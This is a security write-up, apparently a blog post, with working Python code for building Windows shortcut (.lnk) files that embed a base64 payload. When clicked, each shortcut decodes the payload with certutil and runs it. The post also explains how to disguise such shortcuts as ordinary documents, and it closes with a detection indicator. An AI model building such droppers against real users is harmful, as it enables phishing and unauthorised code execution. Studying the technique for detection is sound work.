Self-extracting Windows shortcuts PoC

Windows shortcut files (.lnk) are trusted by users because they are the everyday way to open files and programs. That trust is misplaced: a shortcut is not a document, it is a stored command line. Double-clicking it runs the target and arguments recorded in the file with no prompt. Explorer also never displays the .lnk extension, even when "hide extensions" is turned off, so a shortcut named invoice.pdf.lnk shows up as invoice.pdf and can carry whatever icon the author chooses. Users therefore have no reliable visual cue to tell a harmless shortcut from a harmful one, and .lnk files from untrusted sources should be treated like executables.

This paper describes a method for embedding a file within a shortcut file, such that when the shortcut is executed the contained file is extracted and executed as well. The method relies on certutil.exe, a certificate utility preinstalled on every Windows system and a well-known living-off-the-land binary: its -decode switch turns a base64 text file back into the original bytes. The payload is stored base64-encoded inside the shortcut itself; when the shortcut is opened, the command it carries writes the base64 out, decodes it with certutil and runs the result.

To create and configure Windows shortcuts from Python, install the winshell library together with pywin32 (historically published as pypiwin32), on which winshell is a thin wrapper. With these installed, a few lines of Python produce a shortcut that opens a command prompt and runs an arbitrary command line when clicked:

import winshell  # requires pywin32 (winshell wraps IShellLink from it)

# Create (or overwrite) the shortcut; it is written to disk when the block exits.
with winshell.shortcut(r"C:\Temp\shortcut.lnk") as shortcut:
    shortcut.path = "%COMSPEC%"        # resolved by the shell to cmd.exe
    shortcut.arguments = "/c winver"   # cmd.exe runs winver, then exits

Here %COMSPEC% resolves to cmd.exe, and /c tells it to execute the winver command and exit, so clicking the shortcut displays the installed Windows version. Anything that can be written on a cmd.exe command line can be put in the arguments field the same way.
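The following is an added example, not the author's PoC code, showing one way to build the self-extracting shortcut described above with the same winshell API as the snippet. It carries the payload as base64 inside the shortcut's own arguments field; at click time cmd.exe echoes the base64 to a file, certutil -decode recovers the bytes and start runs them. The temp file names, the batch-file payload and the %TEMP% staging location are my choices; the 8191-character limit is cmd.exe's real command-line maximum. Writing the .lnk itself needs winshell and therefore Windows; the encoding and extraction functions run anywhere.

```python
import base64

# Hypothetical staging paths; any location the user can write to would do.
STAGE_B64 = r"%TEMP%\stage.b64"
STAGE_BIN = r"%TEMP%\stage.cmd"

# cmd.exe rejects command lines longer than 8191 characters, and the shortcut
# produces "<path to cmd.exe> <arguments>", so leave room for the path.
CMD_MAX_LEN = 8191
COMSPEC_PATH_MARGIN = 64


def build_arguments(payload: bytes) -> str:
    """Return the cmd.exe argument string that re-creates and runs `payload`."""
    b64 = base64.b64encode(payload).decode("ascii")
    # The space before '>' matters: if the base64 ends in a digit, e.g. 'AAA1>',
    # cmd.exe would parse '1>' as a redirection of handle 1 and silently drop
    # the digit from the payload. certutil ignores the trailing blank.
    stages = [
        f"echo {b64} >{STAGE_B64}",
        f"certutil -f -decode {STAGE_B64} {STAGE_BIN}",  # -f: overwrite an old stage
        f'start "" {STAGE_BIN}',
    ]
    args = '/c "' + " & ".join(stages) + '"'
    if len(args) + COMSPEC_PATH_MARGIN > CMD_MAX_LEN:
        raise ValueError("payload too large for a single cmd.exe command line")
    return args


def extract_payload(arguments: str) -> bytes:
    """Recover the embedded file from a shortcut's arguments (the analyst's view)."""
    start = arguments.index("echo ") + len("echo ")
    end = arguments.index(" >", start)
    return base64.b64decode(arguments[start:end])


def write_self_extracting_lnk(path: str, payload: bytes) -> None:
    """Write the shortcut with winshell; requires Windows and pywin32."""
    try:
        import winshell
    except ImportError as exc:
        raise RuntimeError("winshell (and pywin32) are required to write the .lnk") from exc
    with winshell.shortcut(path) as lnk:
        lnk.path = "%COMSPEC%"
        lnk.arguments = build_arguments(payload)
        lnk.description = "Self-extracting shortcut PoC"


if __name__ == "__main__":
    # Constructed, harmless payload: a batch file that announces itself.
    demo = b"@echo off\r\necho self-extracted payload ran\r\npause\r\n"
    print(build_arguments(demo))
    write_self_extracting_lnk(r"C:\Temp\selfextract.lnk", demo)
```

Because everything sits in the arguments string, the payload must fit the 8191-character limit after base64 expansion (roughly 6 KB of raw bytes); larger files need a different carrier, for example data appended after the shortcut structure, which this example does not cover. For detection, the same fields are the indicator: a shortcut whose target is cmd.exe and whose arguments contain a long base64 run and certutil -decode is worth flagging regardless of its icon or displayed name.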


Jan. 2, 2023, 3:04 p.m. | By Jean-Pierre LESUEUR